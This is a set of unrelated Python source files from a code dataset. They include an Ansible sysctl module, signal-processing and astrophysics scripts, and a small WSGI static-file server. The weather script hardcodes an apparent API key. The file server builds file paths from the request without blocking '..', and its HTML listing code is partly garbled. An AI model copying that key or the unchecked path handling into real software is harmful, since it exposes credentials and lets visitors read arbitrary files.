(https://bugzilla.redhat.com/show_bug.cgi?id=1264080). That's why we\n # also have to check stderr for errors. For now we will only fail on\n # specific errors defined by the regex below.\n errors_regex = r'^sysctl: setting key \"[^\"]+\": (Invalid argument|Read-only file system)$'\n return re.search(errors_regex, err, re.MULTILINE) is not None\n\n # ==============================================================\n # SYSCTL COMMAND MANAGEMENT\n # ==============================================================\n\n # Use the sysctl command to find the current value\n def get_token_curr_value(self, token):\n if self.platform == 'openbsd':\n # openbsd doesn't support -e, just drop it\n thiscmd = \"%s -n %s\" % (self.sysctl_cmd, token)\n else:\n thiscmd = \"%s -e -n %s\" % (self.sysctl_cmd, token)\n rc, out, err = self.module.run_command(thiscmd, environ_update=self.LANG_ENV)\n if rc != 0:\n return None\n else:\n return out\n\n # Use the sysctl command to set the current value\n def set_token_value(self, token, value):\n if len(value.split()) > 0:\n value = '\"' + value + '\"'\n if self.platform == 'openbsd':\n # openbsd doesn't accept -w, but since it's not needed, just drop it\n thiscmd = \"%s %s=%s\" % (self.sysctl_cmd, token, value)\n elif self.platform == 'freebsd':\n ignore_missing = ''\n if self.args['ignoreerrors']:\n ignore_missing = '-i'\n # freebsd doesn't accept -w, but since it's not needed, just drop it\n thiscmd = \"%s %s %s=%s\" % (self.sysctl_cmd, ignore_missing, token, value)\n else:\n ignore_missing = ''\n if self.args['ignoreerrors']:\n ignore_missing = '-e'\n thiscmd = \"%s %s -w %s=%s\" % (self.sysctl_cmd, ignore_missing, token, value)\n rc, out, err = self.module.run_command(thiscmd, environ_update=self.LANG_ENV)\n if rc != 0 or self._stderr_failed(err):\n self.module.fail_json(msg='setting %s failed: %s' % (token, out + err))\n else:\n return rc\n\n # Run sysctl -p\n def reload_sysctl(self):\n if self.platform == 'freebsd':\n # freebsd doesn't support -p, so reload the sysctl service\n rc, out, err = self.module.run_command('/etc/rc.d/sysctl reload', environ_update=self.LANG_ENV)\n elif self.platform == 'openbsd':\n # openbsd doesn't support -p and doesn't have a sysctl service,\n # so we have to set every value with its own sysctl call\n for k, v in self.file_values.items():\n rc = 0\n if k != self.args['name']:\n rc = self.set_token_value(k, v)\n # FIXME this check is probably not needed as set_token_value would fail_json if rc != 0\n if rc != 0:\n break\n if rc == 0 and self.args['state'] == \"present\":\n rc = self.set_token_value(self.args['name'], self.args['value'])\n\n # set_token_value would have called fail_json in case of failure\n # so return here and do not continue to the error processing below\n # https://github.com/ansible/ansible/issues/58158\n return\n else:\n # system supports reloading via the -p flag to sysctl, so we'll use that\n sysctl_args = [self.sysctl_cmd, '-p', self.sysctl_file]\n if self.args['ignoreerrors']:\n sysctl_args.insert(1, '-e')\n\n rc, out, err = self.module.run_command(sysctl_args, environ_update=self.LANG_ENV)\n\n if rc != 0 or self._stderr_failed(err):\n self.module.fail_json(msg=\"Failed to reload sysctl: %s\" % to_native(out) + to_native(err))\n\n # ==============================================================\n # SYSCTL FILE MANAGEMENT\n # ==============================================================\n\n # Get the token value from the sysctl file\n def read_sysctl_file(self):\n\n lines = []\n if os.path.isfile(self.sysctl_file):\n try:\n with open(self.sysctl_file, \"r\") as read_file:\n lines = read_file.readlines()\n except IOError as e:\n self.module.fail_json(msg=\"Failed to open %s: %s\" % (to_native(self.sysctl_file), to_native(e)))\n\n for line in lines:\n line = line.strip()\n self.file_lines.append(line)\n\n # don't split empty lines or comments or line without equal sign\n if not line or line.startswith((\"#\", \";\")) or \"=\" not in line:\n continue\n\n k, v = line.split('=', 1)\n k = k.strip()\n v = v.strip()\n self.file_values[k] = v.strip()\n\n # Fix the value in the sysctl file content\n def fix_lines(self):\n checked = []\n self.fixed_lines = []\n for line in self.file_lines:\n if not line.strip() or line.strip().startswith((\"#\", \";\")) or \"=\" not in line:\n self.fixed_lines.append(line)\n continue\n tmpline = line.strip()\n k, v = tmpline.split('=', 1)\n k = k.strip()\n v = v.strip()\n if k not in checked:\n checked.append(k)\n if k == self.args['name']:\n if self.args['state'] == \"present\":\n new_line = \"%s=%s\\n\" % (k, self.args['value'])\n self.fixed_lines.append(new_line)\n else:\n new_line = \"%s=%s\\n\" % (k, v)\n self.fixed_lines.append(new_line)\n\n if self.args['name'] not in checked and self.args['state'] == \"present\":\n new_line = \"%s=%s\\n\" % (self.args['name'], self.args['value'])\n self.fixed_lines.append(new_line)\n\n # Completely rewrite the sysctl file\n def write_sysctl(self):\n # open a tmp file\n fd, tmp_path = tempfile.mkstemp('.conf', '.ansible_m_sysctl_', os.path.dirname(self.sysctl_file))\n f = open(tmp_path, \"w\")\n try:\n for l in self.fixed_lines:\n f.write(l.strip() + \"\\n\")\n except IOError as e:\n self.module.fail_json(msg=\"Failed to write to file %s: %s\" % (tmp_path, to_native(e)))\n f.flush()\n f.close()\n\n # replace the real one\n self.module.atomic_move(tmp_path, self.sysctl_file)\n\n\n# ==============================================================\n# main\n\ndef main():\n\n # defining module\n module = AnsibleModule(\n argument_spec=dict(\n name=dict(aliases=['key'], required=True),\n value=dict(aliases=['val'], required=False, type='str'),\n state=dict(default='present', choices=['present', 'absent']),\n reload=dict(default=True, type='bool'),\n sysctl_set=dict(default=False, type='bool'),\n ignoreerrors=dict(default=False, type='bool'),\n sysctl_file=dict(default='/etc/sysctl.conf', type='path')\n ),\n supports_check_mode=True,\n required_if=[('state', 'present', ['value'])],\n )\n\n if module.params['name'] is None:\n module.fail_json(msg=\"name cannot be None\")\n if module.params['state'] == 'present' and module.params['value'] is None:\n module.fail_json(msg=\"value cannot be None\")\n\n # In case of in-line params\n if module.params['name'] == '':\n module.fail_json(msg=\"name cannot be blank\")\n if module.params['state'] == 'present' and module.params['value'] == '':\n module.fail_json(msg=\"value cannot be blank\")\n\n result = SysctlModule(module)\n\n module.exit_json(changed=result.changed)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"openshift/openshift-ansible","sub_path":"roles/openshift_node/library/sysctl.py","file_name":"sysctl.py","file_ext":"py","file_size_in_byte":15277,"program_lang":"python","lang":"en","doc_type":"code","stars":2139,"dataset":"github-code","pt":"66"} +{"seq_id":"3461536724","text":"'''\n@date: 2021.03.09\n@author: Ruixin Lee\nThis file is for implementations of several kinds of Fourier Transform,\nsuch as Fast Fourier Transform, Short-Time Fourier Transform and so on.\n对于MAHNOB-HCI数据集来说,一个文件代表的是 119s 的数据采集。眼动数据集每秒60个样本,采样率60Hz。\n其实是接近120s,但是第一秒没到60个,所以一般从第2s开始计算。所以是119秒\n\n这个文件要做的主要就是,将这瞳孔直径信号分为 4个 频率的波,并且计算对应的功率。其实也就是计算瞳孔直径的PSD特征。\n最终,\n'''\n\n\nimport scipy as sp\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n\ndef MySTFT_V1():\n '''\n reference: https://www.cnblogs.com/klchang/p/9280509.html\n :return: None\n '''\n import scipy.io.wavfile\n # Read wav file\n # \"OSR_us_000_0010_8k.wav\" is downloaded from http://www.voiptroubleshooter.com/open_speech/american.html\n sample_rate, signal = scipy.io.wavfile.read(\"OSR_us_000_0010_8k.wav\")\n # print(\"sample rate:\\n\", sample_rate) # sample rate is 8000.\n\n # Get speech data in the first 2 seconds\n # sample rate is 8000, here the length of list of the signal is 1600, [0, 2×8000).\n signal = signal[0:int(2. * sample_rate)] # input signal --> 2 seconds,提取前2秒的信号\n\n print(\"signal:\\n\", signal, \"\\nsignal type:\\n\", type(signal), \"\\nsignal length:\\n\", len(signal))\n # one dimensional array, type: , length: 1600\n\n # Calculate the short time fourier transform\n pow_spec = stft_calculation(signal, sample_rate)\n # print(\"power spectral density:\\n\", pow_spec)\n print(\"power spectral density:\\n\", pow_spec,\n \"\\npow_spec type:\\n\", type(pow_spec), \"\\npow_spec length y:\\n\", len(pow_spec),\n \"\\npow_spec x:\", len(pow_spec[0]))\n\n plt.imshow(pow_spec)\n plt.tight_layout()\n plt.show()\n\n # print(\"END!!!\")\n\n return None\n\n\n# sample_rate = 60Hz\ndef sample_rate_calculation(filepath=None):\n '''\n 该函数能够利用时间戳计算存储在某种信号的文本文件中的采样率\n 该函数暂时默认仅用于MAHNOB-HCI-TAGGING数据集的眼动采样频率计算\n :return: 采样率 sample_rate\n '''\n sample_rate = 0\n df = pd.DataFrame(pd.read_csv(filepath))\n time_stamp = df['Timestamp']\n print(type(time_stamp))\n time_stamp = np.array(time_stamp)\n print(type(time_stamp))\n print(time_stamp)\n return sample_rate\n\n\ndef MySTFT_V2(filepath=None):\n sample_rate = 60 # 眼动信号的采样频率为60Hz\n signal_file = pd.DataFrame(pd.read_csv(filepath))\n signal_file['PupilDiameter'] = signal_file['PupilRight']-signal_file['PupilLeft']\n # 得到'PupilDiameter'列后,开始计算\n signal = np.abs(np.array(signal_file['PupilDiameter']))\n print(\"signal:\\n\", signal)\n # print(\"sample rate:\\n\", sample_rate) # sample rate is 8000.\n # Get speech data in the first 2 seconds\n # sample rate is 8000, here the length of list of the signal is 1600, [0, 2×8000).\n signal = signal[0:int(2. * sample_rate)] # input signal --> 2 seconds,提取前2秒的信号\n print(\"signal:\\n\", signal, \"\\nsignal type:\\n\", type(signal), \"\\nsignal length:\\n\", len(signal))\n # one dimensional array, type: , length: 1600\n # Calculate the short time fourier transform\n pow_spec = stft_calculation(signal=signal, sample_rate=60, frame_size=0.025, frame_stride=0.05)\n # print(\"power spectral density:\\n\", pow_spec)\n print(\"power spectral density:\\n\", pow_spec,\n \"\\npow_spec type:\\n\", type(pow_spec), \"\\npow_spec length y:\\n\", len(pow_spec),\n \"\\npow_spec x:\", len(pow_spec[0]))\n plt.imshow(pow_spec)\n plt.tight_layout()\n plt.show()\n print(\"END!!!\")\n return None\n\n\ndef stft_calculation(signal, sample_rate=16000, frame_size=0.025, # frame_size设置为 25ms,即0.025s\n frame_stride=0.01, winfunc=np.hamming, NFFT=512):\n '''\n :param signal: 输入的信号,这里是一个一维数组\n :param sample_rate: 采样频率,又称采样率,每秒采集的样本的数量,单位是赫兹(Hz)\n :param frame_size: 将信号分为较短的帧的尺寸size,在语音处理中,通常帧大小在 20ms 到 40ms之间\n :param frame_stride: 相邻帧的滑动尺寸或跳跃尺寸,通常帧的滑动尺寸在 10ms到 20ms之间,这里设置为 10ms,即 0.01s\n :param winfunc: 窗函数采用汉明窗函数 (Hamming Function)\n :param NFFT: 在每一帧,进行512点快速傅里叶变换,即NFFT==512\n :return: pow_frames\n '''\n # Calculate the number of frames from the signal\n # frame_size指每次提取的大小,也就是每个“帧”的大小,每次选取一定时间内的信号。\n # 比如,frame_size==1,则选取一秒内的信号。而采样频率若为50Hz,则一共有1×50个信号,如果是2秒,且采样率为50Hz,则2×50==100个信号样本。\n frame_length = frame_size * sample_rate # 样本的长度,这里是0.025×8000==200,即每次200个信号样本\n frame_step = frame_stride * sample_rate # 步长frame_step,用每次滑动的尺寸乘以采样率来获得。\n signal_length = len(signal)\n frame_length = int(round(frame_length))\n frame_step = int(round(frame_step))\n print(\"frame step: \", frame_step)\n\n delta_length = float(np.abs(signal_length-frame_length))\n num_frames = int(np.ceil(delta_length/frame_step)) + 1\n\n # zero padding\n pad_signal_length = num_frames * frame_step + frame_length\n z = np.zeros((pad_signal_length - signal_length))\n # Pad signal to make sure that all frames have equal number of samples\n # without truncating any samples from the original signal\n pad_signal = np.append(signal, z)\n\n # Slice the signal into frames from indices\n np_title_1 = np.tile(np.arange(0, frame_length), (num_frames, 1))\n np_title_2 = np.tile(np.arange(0, num_frames * frame_step, frame_step), (frame_length, 1)).T\n indices = np_title_1 + np_title_2\n\n frames = pad_signal[indices.astype(np.int32, copy=False)]\n # Get windowed frames\n frames *= winfunc(frame_length)\n # Compute the one-dimensional n-point discrete Fourier Transform(DFT) of\n # a real-valued array by means of an efficient algorithm called Fast Fourier Transform (FFT)\n mag_frames = np.absolute(np.fft.rfft(frames, NFFT))\n # Compute power spectrum\n pow_frames = (1.0/NFFT) * (mag_frames**2)\n\n print(\"pow_frames:\\n\", type(pow_frames))\n print(pow_frames.shape) # (41, 257)\n print(pow_frames)\n\n return pow_frames\n\n\nif __name__ == '__main__':\n # MySTFT_V1()\n # sample_rate_calculation(filepath='../../data/mahnob_example/2/P1-Rec1-All-Data-New_Section_2.csv')\n # pass\n MySTFT_V2(filepath='../../data/mahnob_example/2/P1-Rec1-All-Data-New_Section_2.csv')\n","repo_name":"Breeze1in1drizzle/MindLink-Explorer","sub_path":"MindLink-Eumpy/test/JointTimeFrequencyAnalysis/MyFT.py","file_name":"MyFT.py","file_ext":"py","file_size_in_byte":6904,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"66"} +{"seq_id":"14778549743","text":"from re import compile\nfrom os.path import join, isfile, isdir, islink\nfrom os import listdir\nfrom mimetypes import guess_type\nfrom cStringIO import StringIO\nfrom xml.sax.saxutils import quoteattr\n\n\nclass _FileIter(object):\n\tdef __init__(self, path, buffersize):\n\t\tself.path = path\n\t\tself.buffersize = buffersize\n\n\tdef __iter__(self):\n\t\tself.f = open(self.path, \"rb\")\n\t\treturn self\n\n\tdef next(self):\n\t\twhile True:\n\t\t\tblock = self.f.read(self.buffersize)\n\t\t\tif not block:\n\t\t\t\traise StopIteration\n\t\t\treturn block\n\n\tdef close(self):\n\t\tif hasattr(self, \"f\"):\n\t\t\tself.f.close()\n\n\nclass StaticFiles(object):\n\t\"\"\" A WSGI static file/folder serving application.\n\n\t@cvar DEFAULT_CONTENT_TYPE: The default content-type used when\n\t\t\tcontent-type cannot be guessed.\n\t\"\"\"\n\tDEFAULT_CONTENT_TYPE = \"application/octet-stream\"\n\tdef __init__(self, root_folder, prefix=\"\",\n\t\t\t\tpattern=\".*\", buffersize=2048, follow_symlinks=False):\n\t\t\"\"\"\n\t\tUsage\n\t\t=====\n\t\t\t>>> app = StaticFiles(\"/my/shared/folder\")\n\n\t\t\tAnd run \"app\" on a wsgi gateway.\n\n\n\t\t@param root_folder: the folder from where to serve files.\n\t\t@param pattern: A regular expression. Only files matching it\n\t\t\t\twill be shown.\n\t\t@param buffersize: The buffersize used when reading files.\n\t\t@param follow_symlinks: Follow symlinks?\n\t\t\"\"\"\n\t\tself.patt = compile(pattern)\n\t\tself.root_folder = root_folder\n\t\tself.buffersize = buffersize\n\t\tself.prefixlen = len(prefix)\n\t\tself.follow_symlinks = follow_symlinks\n\n\n\tdef handle_notfound(self, env, start_response, path):\n\t\t\"\"\" Invoked by __call__ when a file that does not exist is requested.\n\t\t@param env: The WSGI environ dict sent to __call__.\n\t\t@param start_response: The start_response callable sent to __call__.\n\t\t@param path: The requested path without prefix.\n\t\t\"\"\"\n\t\tstart_response(\"404 not found\", [(\"content-type\", \"text/plain\")])\n\t\treturn [\"%s does not exist\" % path]\n\n\tdef list_directory(self, env, start_response, path):\n\t\t\"\"\" Invoked by __call__ when a directory is requested. \"\"\"\n\t\tif path.endswith(\"/\"):\n\t\t\tpath = path[:-1]\n\t\tfolder = join(self.root_folder, path)\n\t\tbuf = StringIO()\n\t\tprint >> buf, \"\"\n\t\tprint >> buf, \"

        %s%s

        \" % (env[\"SCRIPT_NAME\"],\n\t\t\t\tenv[\"PATH_INFO\"])\n\t\tprint >> buf, \"
        \"\n\t\tprint >> buf, \"\"\n\n\t\tstart_response(\"200 OK\", [(\"content-type\", \"text/html\")])\n\t\treturn [buf.getvalue()]\n\n\n\tdef __call__(self, env, start_response):\n\t\tpath = env[\"SCRIPT_NAME\"] + env[\"PATH_INFO\"]\n\t\tpath = path[self.prefixlen:]\n\t\tif path.startswith(\"/\"):\n\t\t\tpath = path[1:]\n\t\treal_path = join(self.root_folder, path)\n\n\t\tif islink(real_path) and not self.follow_symlinks:\n\t\t\treturn self.handle_notfound(env, start_response, path)\n\n\t\tif not self.patt.match(path):\n\t\t\treturn self.handle_notfound(env, start_response, path)\n\n\t\tif isdir(real_path):\n\t\t\treturn self.list_directory(env, start_response, path)\n\t\telif isfile(real_path):\n\t\t\tcontent_type = guess_type(real_path)[0] \\\n\t\t\t\t\tor self.DEFAULT_CONTENT_TYPE\n\t\t\tstart_response(\"200 OK\", [(\"content-type\", content_type)])\n\t\t\treturn _FileIter(real_path, self.buffersize)\n\n\t\treturn self.handle_notfound(env, start_response, path)\n","repo_name":"espenak/enkel","sub_path":"enkel/batteri/staticfiles.py","file_name":"staticfiles.py","file_ext":"py","file_size_in_byte":3549,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"35703723484","text":"#!/usr/bin/env python3.6\n# coding:utf-8\n# maxiaobo\n# 2019/05/24\n\nimport logging\nimport time\nimport os\n\ncur_dir = os.path.dirname(__file__)\n\nlog_path = os.path.dirname(os.path.dirname(os.path.abspath(cur_dir))) + \"/rocketmq_query_service/logs/\"\nif not os.path.isdir(log_path):\n os.mkdir(log_path)\nlog_filename = log_path + \"rocketmq-query-backend-\" + time.strftime('%Y%m%d') + \".log\"\n\n\nlogging.basicConfig(level=logging.INFO,\n format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n filename=log_filename,\n filemode='a')\n\n\nlog = logging.getLogger('root')\n","repo_name":"hnzjCoder/rocketmq_query","sub_path":"libs/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"24631177826","text":"# What is the largest prime factor of the number 600851475143 ?\n\n\ndef prime_factors(n):\n factors = [1]\n last = n\n\n while last > 1:\n c = 2\n while last % c > 0:\n c += 1\n\n factors.append(c)\n last /= c\n return factors\n\nanswer = max(prime_factors(600851475143))\n","repo_name":"Roasbeef/Project-Euler-Solutions-","sub_path":"1-10/p_3.py","file_name":"p_3.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"24727834846","text":"\"\"\" A base class \"\"\"\n\n\nclass Base:\n \"\"\" A base class from which all other classes inherit \n Attributes:\n nb_objects: Number of instantiated objects of the class\n \"\"\"\n __nb_objects = 0\n\n\n def __init__(self, id=None):\n \"\"\" Instantiation of the base class\n Args:\n id(int): the id of the new base.\n \"\"\"\n if id != None:\n self.id = id\n else:\n Base.__nb_objects += 1\n self.id = Base.__nb_objects\n\n","repo_name":"Efeoseaje/alx_python","sub_path":"python-almost_a_circle/models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"25347282603","text":"# What has the temp been like on Christmas in NYC from 2000-2015?\n# import csv and request modules\nimport csv\nimport requests\n\n# set up URL for request\nendpoint = 'https://api.darksky.net/forecast/'\napi_key = 'da5d52438b53e27259e8e2bdc2f7c51f'\nlat = '40.7128'\nlon= '-73.9352'\n\n# open file in write mode\ncsvfile= open('dataproject2.csv', 'w')\n\n# create the csv writer\ncsvwriter= csv.writer(csvfile, delimiter= ',')\ncsvwriter.writerow(['year', 'temp'])\n\nfor y in range(2000,2015):\n time = '%d-12-25T12:00:00' % y\n \n # url for request\n url = endpoint + api_key + '/' + lat + ',' + lon + ',' + time\n \n # make request\n r = requests.get(url)\n weather = r.json()\n temp = weather['hourly']['data'][0]['temperature']\n print(temp)\n csvwriter.writerow([y, temp])\n \ncsvfile.close()\n","repo_name":"UCMHSProgramming16-17/final-project-shefalidahiya","sub_path":"final-project-shefalidahiya/dataproject2.py","file_name":"dataproject2.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"1572747938","text":"import visualizations.plot_relational_coding as plot\nimport visualizations.plot_snr_measurement as plot_snr\nimport visualizations.plot_temporal_relational_coding_window as plot_window\nfrom data_center.static_data.static_data import StaticData\nfrom enums import DataType, FlowType\nfrom flow_manager import FlowManager\n\n# load dictionary to static class members\nStaticData.inhabit_class_members()\n\n\ndef relation_coding_for_all_roi(avg_data: bool = False, with_plot: bool = False, group: str = '',\n shuffle: bool = False):\n for roi in StaticData.ROI_NAMES:\n fm = FlowManager()\n fm.execute(DataType.FMRI, roi, avg_data, group, shuffle, flow_type=FlowType.RELATIONAL_CODING)\n del fm\n\n if with_plot:\n if avg_data:\n plot.plot_pipe_avg(roi, group, shuffle)\n else:\n plot.plot_pipe(roi)\n\n\ndef relation_coding_for_specific_roi(roi, avg_data: bool = False, with_plot: bool = False):\n fm = FlowManager()\n fm.execute(DataType.FMRI, roi, avg_data, flow_type=FlowType.RELATIONAL_CODING)\n if with_plot:\n if avg_data:\n plot.plot_pipe_avg(roi)\n else:\n plot.plot_pipe(roi)\n\n\ndef activations_pattern_for_all_roi(group, with_plot: bool = False):\n for roi in StaticData.ROI_NAMES:\n fm = FlowManager()\n fm.execute(DataType.FMRI, roi, group, flow_type=FlowType.ACTIVATIONS_PATTERNS)\n del fm\n if with_plot:\n plot.plot_activation_pattern(roi, group)\n\n\ndef activations_pattern_for_specific_roi(roi, group, with_plot: bool = False):\n fm = FlowManager()\n fm.execute(DataType.FMRI, roi, group, flow_type=FlowType.ACTIVATIONS_PATTERNS)\n if with_plot:\n plot.plot_activation_pattern(roi, group)\n\n\ndef singular_relational_coding(group, with_plot: bool = False):\n for roi in StaticData.ROI_NAMES:\n fm = FlowManager()\n fm.execute(DataType.FMRI, group, flow_type=FlowType.SINGULAR_RELATIONAL_CODING)\n del fm\n\n\ndef singular_relational_coding_for_specific_roi(roi, group, with_plot: bool = False):\n fm = FlowManager()\n fm.execute(DataType.FMRI, roi, group, flow_type=FlowType.SINGULAR_RELATIONAL_CODING)\n\n\ndef custom_temporal_relational_coding_for_specific_roi(roi, rest_ws, task_ws, with_plot: bool = False):\n fm = FlowManager()\n fm.execute(DataType.FMRI, roi, rest_ws, task_ws, flow_type=FlowType.CUSTOM_TEMPORAL_RELATIONAL_CODING)\n if with_plot:\n plot.custom_window_rc_histogram(roi=roi, rest_window=rest_ws, task_window=task_ws)\n\n\ndef custom_temporal_relational_coding(rest_ws, task_ws, with_plot: bool = False):\n for roi in StaticData.ROI_NAMES:\n fm = FlowManager()\n fm.execute(DataType.FMRI, roi, rest_ws, task_ws, flow_type=FlowType.CUSTOM_TEMPORAL_RELATIONAL_CODING)\n del fm\n\n if with_plot:\n plot.custom_window_rc_histogram(roi=roi, rest_window=rest_ws, task_window=task_ws)\n\n\ndef moving_window_custom_temporal_relational_coding(**kwargs):\n if isinstance(kwargs.get('roi'), list):\n rois = kwargs.pop('roi')\n\n elif kwargs.get('roi'):\n rois = [kwargs.pop('roi')]\n\n else:\n rois = StaticData.ROI_NAMES\n\n avg_data = kwargs.get('average_data')\n for init_window in ['end']:\n task_ws = 10\n rest_s, rest_e = (0, 5)\n while rest_e < 30:\n rest_ws = rest_s, rest_e\n for roi in rois:\n fm = FlowManager()\n fm.execute(DataType.FMRI, roi, rest_ws, init_window, task_ws,\n flow_type=FlowType.CUSTOM_TEMPORAL_RELATIONAL_CODING, **kwargs)\n del fm\n\n print('done window', rest_ws)\n rest_s += 1\n rest_e += 1\n\n if kwargs.get('with_plot'):\n plot_window.window_relational_coding_plot(task_window=init_window, show=True, save_img=True,\n avg_data=avg_data, roi=rois)\n if kwargs.get('with_bar'):\n plot_window.window_average_rc_bar_plot(avg_data=avg_data, with_shuffle=True, save_img=True)\n\n\ndef isfc_relational_coding(with_plot=None):\n for roi in StaticData.ROI_NAMES:\n fm = FlowManager()\n fm.execute(DataType.FMRI, roi, flow_type=FlowType.ISFC_RELATIONAL_CODING)\n del fm\n\n if with_plot:\n plot.plot_pipe(roi)\n\n\ndef moving_window_custom_temporal_relational_coding_with_signal_processing(\n roi,\n average_data,\n shuffle,\n filtering,\n decomposition,\n with_plot\n):\n for init_window in ['end']:\n task_ws = 10\n rest_s, rest_e = (0, 5)\n while rest_e < 19:\n rest_ws = rest_s, rest_e\n # for roi in StaticData.ROI_NAMES:\n fm = FlowManager()\n fm.execute(\n DataType.FMRI,\n roi,\n rest_ws,\n init_window,\n task_ws,\n avg_data=average_data,\n shuffle_rest=shuffle,\n filtering=filtering,\n decomposition=decomposition,\n filter_order=10,\n filter_cut_off=0.09,\n flow_type=FlowType.CUSTOM_TEMPORAL_RELATIONAL_CODING\n )\n del fm\n rest_s += 1\n rest_e += 1\n print(rest_ws)\n if with_plot:\n plot_window.window_relational_coding_plot(\n roi=roi,\n task_window=init_window,\n mode='pca' if decomposition else 'filtering',\n show=True,\n save_img=True,\n avg_data=average_data,\n filter_order=30,\n filter_cut_off=0.3,\n )\n\n\ndef snr_measurement(**kwargs):\n rois = kwargs.get('roi')\n\n if rois and not isinstance(rois, list):\n rois = [kwargs.get('roi')]\n\n elif not rois:\n rois = StaticData.ROI_NAMES\n\n for init_window in ['end']:\n for group_index in [1, 2, 3, 4, 5, 6]:\n task_ws = 10\n rest_s, rest_e = (0, 5)\n while rest_e < 19:\n rest_ws = rest_s, rest_e\n for roi in rois:\n fm = FlowManager()\n fm.execute(\n DataType.FMRI,\n roi=roi,\n rest_ws=rest_ws,\n init_window=init_window,\n window_moving_size=10,\n # window_range=(10,20),\n task_ws=task_ws,\n group_index=group_index,\n group_subjects=35,\n skip_correlation=False,\n movie_distances=True,\n movie_activation=False,\n shuffle_rest=False,\n flow_type=FlowType.SNR_MEASUREMENTS\n )\n del fm\n rest_s += 1\n rest_e += 1\n\n\n\n\n print('done group i', group_index)\n print('done window', init_window)\n\n if kwargs.get('plot'):\n plot_snr.plot_snr_measurement(\n group_index,\n save_figure=False,\n plot_combined_groups=True,\n plot_heatmap=False,\n max=True\n )\n\n\nif __name__ == '__main__':\n # relation_coding_for_specific_roi()\n # relation_coding_for_all_roi(avg_data=True, with_plot=True, group='_GROUP2')\n # relation_coding_for_all_roi(avg_data=True, with_plot=True, group='_GROUP1')\n # activations_pattern_for_specific_roi('RH_Default_pCunPCC_6', group='_GROUP2', with_plot=True)\n # activations_pattern_for_all_roi(group='', with_plot=True)\n # singular_relational_coding_for_specific_roi('RH_Default_pCunPCC_6', group='')\n # custom_temporal_relational_coding_for_specific_roi(roi='RH_Vis_18',rest_ws=(8, 13), task_ws=10, with_plot=False)\n # custom_temporal_relational_coding(rest_ws=(6, 16), task_ws=10, with_plot=True)\n # moving_window_custom_temporal_relational_coding(with_plot=True)\n\n # relation_coding_for_all_roi(avg_data=True, shuffle=True, with_plot=True)\n\n # moving_window_custom_temporal_relational_coding(average_data=True, shuffle=True, with_plot=False, with_bar=False)\n # moving_window_custom_temporal_relational_coding(average_data=False, shuffle=True, with_plot=False, with_bar=False)\n # moving_window_custom_temporal_relational_coding_with_signal_processing(\n # roi='',\n # average_data=False,\n # shuffle=False,\n # filtering=False,\n # decomposition=True,\n # with_plot=True,\n # )\n\n # moving_window_custom_temporal_relational_coding_with_signal_processing(\n # roi='RH_Default_Temp_6',\n # average_data=False,\n # shuffle=False,\n # filtering=True,\n # decomposition=False,\n # with_plot=True\n # )\n # isfc_relational_coding(with_plot=1)\n snr_measurement(roi='RH_DorsAttn_Post_2')\n # # activations_pattern_for_specific_roi(roi='RH_Default_pCunPCC_1', group='_GROUP2', with_plot=True)\n # moving_window_custom_temporal_relational_coding(\n # # roi=['RH_Default_pCunPCC_1', 'LH_Default_PFC_15', 'RH_Default_Par_1'],\n # average_data=True,\n # shuffle=False,\n # with_plot=True,\n # with_bar=False\n # )","repo_name":"NivYahavMilo/fmri_relational_coding","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"15519792745","text":"# Write a program that extracts links from a given text. The text will come in the form of strings, each representing a\n# sentence. You need to extract only the valid links from it. Example:\nimport re\npattern = r'\\www\\.[A-Za-z0-9-]+(\\.[a-z]+)+'\nline = input()\nwhile line:\n\tresult = re.finditer(pattern, line)\n\tfor c in result:\n\t\tif c.group():\n\t\t\tprint(c.group())\n\n\tline = input()","repo_name":"Pavel-Petkov03/SoftuniHomeworks","sub_path":"02.Programming Fundamentals with Python/03. Основни задачи/Задачи/18. Exercise Regular Expressions/06. Extract the Links.py","file_name":"06. Extract the Links.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"16775963508","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[6]:\n\n\n# Goal is to reproduce NFW and cored (mleft=1) in fig 4 in https://arxiv.org/pdf/2106.09050.pdf\n\nfrom colossus.cosmology import cosmology\nimport numpy as np\nimport matplotlib.pyplot as plt\nget_ipython().run_line_magic('matplotlib', 'inline')\nfrom colossus.halo import mass_so\nfrom colossus.halo import mass_defs\nfrom colossus.halo import mass_adv\nfrom colossus.halo import profile_nfw\nfrom colossus.halo import profile_einasto\nfrom colossus.halo import concentration\nfrom scipy.integrate import quad\n\ncosmo = cosmology.setCosmology('planck18')\n\n#They start with Mvir=M200=1e9Msun. Derive R200, c200, r_s, and generate a list of radial values for the plot\n\nM200 = 1E9\nR200 = mass_so.M_to_R(M200, 1, '200c')\nc200 = concentration.concentration(M200, '200c', 1, 'diemer19')\nr_s = R200/c200\nr = np.linspace(1e-3, R200, 1500)\n\n# Define density functions and integrate out to R200 to obtain enclosed mass functions\n\ndef rho_prof_NFW(r, C):\n return C / ((r/r_s)*((1+r/r_s)**2))\n\ndef rho_prof_CORED(r, C):\n return C / ((1+(r/r_s)**3))\n\nresult1, _ = quad(lambda r: 4*np.pi*rho_prof_NFW(r, 1)*r**2, 1e-3, R200)\nC1 = M200/result1\n\nresult2, _ = quad(lambda r: 4*np.pi*rho_prof_CORED(r, 1)*r**2, 1e-3, R200)\nC2 = 